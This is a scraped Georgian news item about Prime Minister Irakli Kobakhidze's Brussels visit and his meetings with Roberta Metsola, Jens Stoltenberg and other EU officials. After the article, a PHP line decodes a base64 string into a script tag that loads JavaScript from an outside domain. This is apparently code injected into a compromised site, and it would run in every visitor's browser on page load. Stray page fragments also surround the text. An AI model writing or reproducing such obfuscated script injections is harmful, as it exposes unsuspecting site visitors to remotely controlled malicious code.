celsiusi
ავერსი საქკაბელი

საქართველოს პრემიერ-მინისტრი ირაკლი კობახიძე დღეს ბრიუსელში ვიზიტის ფარგლებში შეხვედრას გამართავს ევროპარლამენტის პრეზიდენტთან, რობერტა მეცოლასთან და ნატო-ს გენერალურ მდივანთან, იენს სტოლტენბერგთან.

ირაკლი კობახიძისა და ევროპარლამენტის პრეზიდენტის, რობერტა მეცოლას შეხვედრაზე საუბარი იქნება ახალ ნაბიჯებსა და შესაძლებლობებზე, რაც საქართველოსთვის კანდიდატის სტატუსის მინიჭებამ მოიტანა.

დღესვე, ორმხრივი შეხვედრების გარდა, ჩრდილოატლანტიკური საბჭოს ფარგლებში, ნატო-საქართველოს კომისიის სხდომა გაიმართება. სხდომის შემდეგ იენს სტოლტენბერგი და ირაკლი კობახიძე ერთობლივ განცხადებებს გააკეთებენ.

ბრიუსელში ირაკლი კობახიძის ვიზიტი 20 თებერვალს დაიწყო. საქართველოს პრემიერ-მინისტრმა უკვე გამართა შეხვედრები ევროკავშირის უმაღლეს წარმომადგენელთან, ჯოზეფ ბორელთან, ევროკომისარ ოლივერ ვარჰეისთან და ევროპის საბჭოს პრეზიდენტთან, შარლ მიშელთან.

200
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");